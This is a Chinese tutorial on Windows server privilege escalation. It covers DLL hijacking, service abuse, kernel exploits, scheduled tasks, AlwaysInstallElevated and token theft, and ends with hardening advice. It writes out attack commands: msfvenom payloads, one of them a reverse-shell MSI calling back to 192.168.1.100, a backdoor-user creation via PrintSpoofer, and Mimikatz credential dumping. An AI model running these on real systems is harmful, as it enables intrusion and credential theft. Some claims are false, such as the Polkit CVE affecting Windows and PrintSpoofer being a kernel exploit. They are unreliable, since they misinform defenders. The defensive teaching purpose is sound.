在渗透测试中，​​权限提升（提权）​​是从低权限账户（如IIS、Apache运行账户）获取系统管理员（如SYSTEM）权限的关键步骤。本文将从实战角度解析Windows服务器提权的常见技术，并结合真实场景与防御方案，帮助安全人员理解攻击原理并加固系统。

---

目录

一、为什么Windows服务器容易被提权？

1. ​​默认配置缺陷​​

2. ​​服务与进程漏洞​​

3. ​​补丁更新滞后​​

二、6种常见提权方法及实战场景

1. ​​DLL劫持（DLL Hijacking）​​

2. ​​服务漏洞利用​​

3. ​​内核漏洞提权​​

4. ​​计划任务滥用​​

5. ​​注册表键篡改​​

6. ​​令牌窃取（Token Theft）​​

三、防御方案：4层加固策略

1. ​​权限最小化​​

2. ​​补丁与更新​​

3. ​​安全配置​​

4. ​​监控与日志​​

四、总结

---

一、为什么Windows服务器容易被提权？

1. ​​默认配置缺陷​​

Windows服务器默认开放高危服务（如SMB、RDP），且早期版本权限控制宽松（如Everyone用户可写目录）。
​​案例​​：Windows Server 2008默认共享C$，若未禁用匿名访问，攻击者可枚举敏感文件。

2. ​​服务与进程漏洞​​

第三方软件（如数据库、备份工具）常以SYSTEM权限运行，一旦存在漏洞即可被利用。
​​案例​​：MySQL服务默认以SYSTEM运行，若存在FILE权限漏洞，可通过写入恶意DLL提权。

3. ​​补丁更新滞后​​

企业内网服务器常因兼容性问题延迟更新补丁，导致已知漏洞长期存在。
​​案例​​：2021年爆发的PrintNightmare漏洞（CVE-2021-1675），利用Windows打印服务未修复的远程代码执行漏洞，可直接获取SYSTEM权限。

---

二、6种常见提权方法及实战场景

1. ​​DLL劫持（DLL Hijacking）​​

​​原理​​：Windows加载DLL时按固定顺序搜索目录（如程序目录→System32），攻击者将恶意DLL置于高优先级路径。
​​场景​​：

• 发现目标服务器运行第三方程序（如备份软件），且安装目录（C:\Program Files\BackupTool）允许普通用户写入。
  ​​操作步骤​​：

1. 使用Procmon监控目标进程加载的DLL。
2. 将恶意DLL（如hijack.dll）编译为同名文件，并放置于程序目录。
3. 重启服务或触发进程，加载恶意DLL执行命令。
   ​​工具​​：

• ​​Metasploit​​：msfvenom -p windows/x64/exec CMD="net user hacker P@ssw0rd /add" -f dll > hijack.dll

2. ​​服务漏洞利用​​

​​原理​​：服务配置错误（如可执行文件路径权限宽松、服务未降权）导致命令执行。
​​场景​​：

• 发现服务MyService的二进制路径为C:\Service\app.exe，且普通用户对app.exe有修改权限。
  ​​操作步骤​​：

1. 替换app.exe为恶意程序（如反向Shell）。
2. 重启服务：sc stop MyService & sc start MyService
   ​​防御检测​​：

• 使用AccessChk检查服务权限：accesschk.exe -wuvc MyService

3. ​​内核漏洞提权​​

​​原理​​：利用Windows内核驱动漏洞（如内存越界、权限校验缺失）直接获取SYSTEM权限。
​​高危漏洞示例​​：

• ​​CVE-2021-4034（Polkit提权）​​：Linux/Windows跨平台漏洞，通过环境变量注入执行任意命令。
• ​​CVE-2022-21882（Windows Win32k提权）​​：利用内核回调机制缺陷实现权限提升。
  ​​利用工具​​：
• ​​PrintSpoofer​​：适用于Windows 10/Server 2019：

  .\PrintSpoofer.exe -i -c "net localgroup administrators hacker /add"

4. ​​计划任务滥用​​

​​原理​​：计划任务以SYSTEM权限运行时，可通过写入恶意任务触发代码执行。
​​场景​​：

• 发现普通用户可修改计划任务目录（C:\Windows\System32\Tasks）。
  ​​操作步骤​​：

1. 创建恶意XML任务文件，定义执行powershell -enc <BASE64_PAYLOAD>。
2. 使用schtasks /create导入任务并触发执行。

5. ​​注册表键篡改​​

​​原理​​：修改注册表键值（如AlwaysInstallElevated）绕过UAC安装恶意MSI包。
​​利用条件​​：

• 注册表键HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated设置为1。
  ​​操作步骤​​：

1. 生成恶意MSI包：msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi > setup.msi
2. 静默安装：msiexec /quiet /i setup.msi

6. ​​令牌窃取（Token Theft）​​

​​原理​​：窃取SYSTEM进程的令牌（如lsass.exe）模拟高权限用户。
​​工具​​：

• ​​Mimikatz​​：

  privilege::debug
  token::elevate
  lsadump::sam

---

三、防御方案：4层加固策略

1. ​​权限最小化​​

• 服务账户：使用独立低权限账户运行服务（非SYSTEM）。
• 文件系统：限制敏感目录写入权限（如C:\Windows\System32）。

2. ​​补丁与更新​​

• 定期更新内核、第三方软件，重点关注​​CVE评分≥7.0​​的漏洞。
• 使用Windows Update或WSUS服务器集中管理补丁。

3. ​​安全配置​​

• 禁用高危服务：关闭SMBv1、PowerShell远程执行（Disable-WSManCredSSP）。
• 启用LSA保护：防止Mimikatz窃取凭证（注册表键RunAsPPL=dword:00000001）。

4. ​​监控与日志​​

• 记录关键事件：服务启动、进程创建、注册表修改（通过Windows事件ID 4688、4657）。
• 部署EDR工具：实时拦截可疑行为（如DLL注入、令牌窃取）。

---

四、总结

Windows提权的本质是​​利用系统弱点突破权限边界​​，防御需从攻击链各环节（漏洞利用、凭证窃取、服务滥用）实施针对性控制。管理员应定期进行​​渗透测试​​与​​红蓝对抗​​，模拟攻击者手法发现潜在风险。

​​实战建议​​：

• 测试环境使用工具：Windows Sysinternals Suite、PowerUp.ps1（自动化提权检测）。
• 关注漏洞情报平台：CVE Details、Exploit-DB、微软安全公告。

通过理解攻击手法并加固系统，可显著降低服务器被攻陷的风险。